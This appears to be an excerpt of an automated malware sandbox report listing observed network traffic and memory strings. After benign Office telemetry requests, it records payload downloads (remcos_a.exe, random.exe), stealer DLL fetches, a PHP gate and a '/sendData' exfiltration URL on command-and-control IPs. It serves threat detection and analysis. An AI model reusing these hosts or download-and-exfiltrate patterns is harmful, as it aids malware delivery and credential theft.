Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/remcos_a.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/buildd.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 07 Nov 2024 02:49:06 GMTIf-None-Match: "672c2aa2-210400"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: dpdnow.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic	DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic	DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic	DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic	DNS traffic detected: DNS query: founpiuer.store

Source: unknown

HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 905sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 07 Nov 2024 03:13:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8%2BUaYVwUDAenbtR%2FT3h5ZEKLpEOdw8Bi8jlh6UM6Y9RZm46%2FWfPovkrqUOWny%2F9MvUKEvqdCeN7rsuOG%2FnT8SB96VsaIYrxlxa%2B90fAHaKG4udAWH43IUCkR9uMMI5juTz4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dea25ad183d2e17-DFW
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 07 Nov 2024 03:13:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ywVumr2iIaZRy0nmOqcvJLT8pqqlt1UfBBmB4%2FTPp1bORfVTsxCYQyHbDYjzRWu8ESE4r2FWWpisX%2BvVqPkt5qKtZoLy8maKDW0EZj0viS2un0LH8qaVnx78U8IQXyd0nTc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dea2601c8862d41-DFW

Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.126.19.171:80
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.43.160.136:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.161.20.142:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://116.202.101.219:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://129.151.109.160:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://132.145.17.167:9090
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8910000.00000004.00000800.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.124.221.201:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8910000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.124.221.201:8080/sendData
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8910000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.124.221.201:8080/sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8910000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.124.221.201:80802E
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.28.185.29:80
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://159.203.174.113:8090
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.235.70.96:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://168.138.211.88:8099
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://18.228.80.130:80
Source: ed55d3f620.exe, 0000001A.00000003.2782263726.00000000007F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: ed55d3f620.exe, 0000001A.00000003.2781997932.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2782263726.00000000007F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/:
Source: ed55d3f620.exe, 0000001A.00000003.2781997932.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2782263726.00000000007F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/a
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe9
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeb
Source: file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exei
Source: ed55d3f620.exe, 0000001A.00000003.2782263726.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000002.2848105530.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exeM
Source: ed55d3f620.exe, 0000001A.00000003.2782263726.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000002.2848105530.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2899426795.00000000008FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: ed55d3f620.exe, 0000001A.00000002.2847893858.00000000003FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exes
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F6D000.00000004.00000020.00020000.00000000.sdmp, c2a8de8bf3.exe, 00000020.00000002.2792882659.000000000126B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206)
Source: c2a8de8bf3.exe, 00000020.00000002.2792882659.000000000126B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/.
Source: file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/3
Source: c2a8de8bf3.exe, 00000020.00000002.2792882659.000000000126B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php-
Source: ed55d3f620.exe, 0000001A.00000002.2848105530.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, c2a8de8bf3.exe, 0000001C.00000002.2630997068.000000000123A000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
